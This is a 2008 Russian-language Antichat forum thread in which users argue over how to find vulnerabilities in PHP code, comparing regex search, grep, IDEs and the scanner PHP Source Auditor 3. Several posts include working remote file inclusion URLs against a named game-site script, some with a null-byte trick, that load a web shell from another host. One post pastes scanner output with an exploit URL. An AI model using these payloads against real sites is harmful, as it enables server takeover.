ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

10.02.2008, 00:54
|
|
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме: 6144796
Репутация:
1095
|
|
>> Не видел ничего подобного нигде. Покажи.
PHP Source Auditor 3, например..
|
|
|

10.02.2008, 01:07
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме: 1845062
Репутация:
1079
|
|
Сообщение от Digimortal
>> Не видел ничего подобного нигде. Покажи.
PHP Source Auditor 3, например..
Только что испробовал его в действии на том же скрипте. Результат - ни одной найденной уязвимости. Есть мысли еще?
|
|
|

10.02.2008, 01:08
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме: 4646474
Репутация:
1424
|
|
х.ле мозг ипать grep и больше НИЧЕГО, лично я только им пользуюсь 
|
|
|

10.02.2008, 01:12
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме: 1845062
Репутация:
1079
|
|
Сообщение от ShAnKaR
х.ле мозг ипать grep и больше НИЧЕГО, лично я только им пользуюсь 
Не все являются счастливыми обладателями unix систем + далеко не все умеют пользоваться командной строкой... Что, разве мой вариант плох?
|
|
|

10.02.2008, 01:46
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
Я Удивлен: Кто нить понимает, что для них это единственный способ искать уязвимости? Статья написана для тех, кто начинает, в тоже время знает основы, и т.д., в свое время я учился по подобным статьям, и поверьте мне это дало определенный результат... Я бы сказал спасибо автору в свое время, может мое нение никого не интересует, но автор молодец
ЗЫ Скорее всего эта самая полезная статья написанная в этом разделе за год
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 10.02.2008 в 01:50..
|
|
|

10.02.2008, 02:18
|
|
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме: 6144796
Репутация:
1095
|
|
>> ЗЫ Скорее всего эта самая полезная статья написанная в этом разделе за год
ой не смеши, в статье описывается "маленькая фишка" и ниче более.. а тему об автоматизации поиска уязвимостей с помощью тех же регулярок можна раскрывать до бесконечности долго..
>> Результат - ни одной найденной уязвимости. Есть мысли еще?
по-моему, Iron просто не учел такой штуки как вожмозность использовать нулл-байт при инклуде,
кстати, и ты тоже про него забыл:
http://site/gamesitescript/plugins/site/themes/21/smallbox.php?themecfg[boxcontentorder]=http://shell?%00
т.ч. чтоб заюзать баг надо еще, чтоб magic_quotes были = off ..
Последний раз редактировалось Digimortal; 10.02.2008 в 02:59..
|
|
|

10.02.2008, 02:36
|
|
Постоянный
Регистрация: 04.11.2007
Сообщений: 331
Провел на форуме: 1724067
Репутация:
806
|
|
Очень давно выкладывали скрипт на ПХП - "PHP source vulnerability scaner", который для указаной папки перебирает разные регулярные выражения. Кто-то из Гринов выкладывал, но к сожалению в скриптах автор не подписан, но немного поискав по форуму можна найти.
Для этого метода можна использовать также Нотепад++, в нем есть функция поиска по регулярных выражениях как в открытых файлах так и в указаной директории + визуально все прекласно видно.
|
|
|

10.02.2008, 04:44
|
|
Постоянный
Регистрация: 06.06.2006
Сообщений: 515
Провел на форуме: 1985206
Репутация:
963
|
|
Метод баянный. Пошло все еще с появления koders.com/code.google.com.
grep пожалуй и правда не слишком удобно (но тем не менее можно) юзать, но в любой нормальной IDE есть поиск по файлам с поддержкой регексов.
|
|
|

10.02.2008, 09:28
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме: 1845062
Репутация:
1079
|
|
Сообщение от Digimortal
по-моему, Iron просто не учел такой штуки как вожмозность использовать нулл-байт при инклуде,
кстати, и ты тоже про него забыл:
http://site/gamesitescript/plugins/site/themes/21/smallbox.php?themecfg[boxcontentorder]=http://shell?%00
т.ч. чтоб заюзать баг надо еще, чтоб magic_quotes были = off ..
А вот и неправда  ))) Чтобы заюзать баг надо после
http://site/gamesitescript/plugins/site/themes/21/smallbox.php?themecfg[boxcontentorder]=http://site/shell.php поставить ? и все, что после - отрежется вопросом, следовательно, работать будет и при magic quotes on. Меня поражает такая некомпетентность и неадекватность. Мой метод хорош, т.к. приносит хорошие результаты. С php скриптом сравнивать бесполезно, т.к. регулярные выражения там просто другие, + чтобы немножко изменить способ поиска или регулярку - придется лезть скрипт переписывать.
2 KSURi
А я разве писал, что он сильно новый? Я лишь описал суть метода, его принцип действия и все необходимое для работы с его помощью. Таких статей еще не было. Кроме того, эту программу я предложил не потому, что только она умеет искать с помощью регулярных выражений, я в курсе, что не только она, а потому, что синтаксис ее регулярных выражений несколько удобнее, чем везде + она сама очень удобна для использования.
2 presidentua
А ты уверен, что искать с помощью php скрипта быстрее и удобнее? А в TextWorkbench встроен текстовый редактор, можно сразу просмотреть файл с уязвимостью целиком... В данном случае самый замечательный php скрипт уступит по функциональности, а главное - по скорости.
Последний раз редактировалось Macro; 10.02.2008 в 09:54..
|
|
|

10.02.2008, 14:17
|
|
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме: 6144796
Репутация:
1095
|
|
>> и все, что после - отрежется вопросом, следовательно, работать будет и при magic quotes on.
ну что тут сказать, я вчера протупил немнога ))
>> Меня поражает такая некомпетентность и неадекватность.
вот тут ты зря.. моя компетентность, например, позволила мне суметь запустить PHP Source Auditor 3 и найти им багу в скрипте, а твоя почему то - только написать, что этот скрипт нифига не находит.. вот кстате:
Код:
Vulnerability Type: Remote File Inclusion
Vulnerable file: /plugins/site/themes/sharp/utilityfunctions.php
Exploit URL: http://localhost/plugins/site/themes/sharp/utilityfunctions.php?cfg[instdir]=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: cfg[instdir]
Line number: 3
Lines:
----------------------------------------------
include $cfg['instdir']."plugins/site/themes/adminlinks.php";
----------------------------------------------
насчет неадекватности я уже промолчу.. )
>> Мой метод хорош, т.к. приносит хорошие результаты.
во-первых, ЭТО НЕ ТВОЙ МЕТОД - его все уже давно юзают - поиск регулярками... (и не важно какую прогу ты при этом юзаешь..) =/
во-вторых, он плох, если сорец весит 5 мб )).. то, что ты описал это не поиск уязвимостей даже - это поиск мест в коде, где они могут быть.. загляни в сорец PHP Source Auditor 3 - он не только ищет места, где могут расположиться уязвимости, он эти уязвимости затем проверяет - вот это более-менее продвинутый способ их поиска..
>> С php скриптом сравнивать бесполезно, т.к. регулярные выражения там просто другие, + чтобы немножко изменить способ поиска или регулярку - придется лезть скрипт переписывать.
бред какой-то, чесслово.. можна всегда написать скрипт который будет искать по заданным тобой регуляркам.. можна даже сделать чтоб по нажатию кнопки открывлся сорец в нужном месте, можно вообще много всего сдлеать, написав свой скрипт, а не юзая шаровару за 40$ (если не ошибаюсь)... ))
Последний раз редактировалось Digimortal; 10.02.2008 в 15:28..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|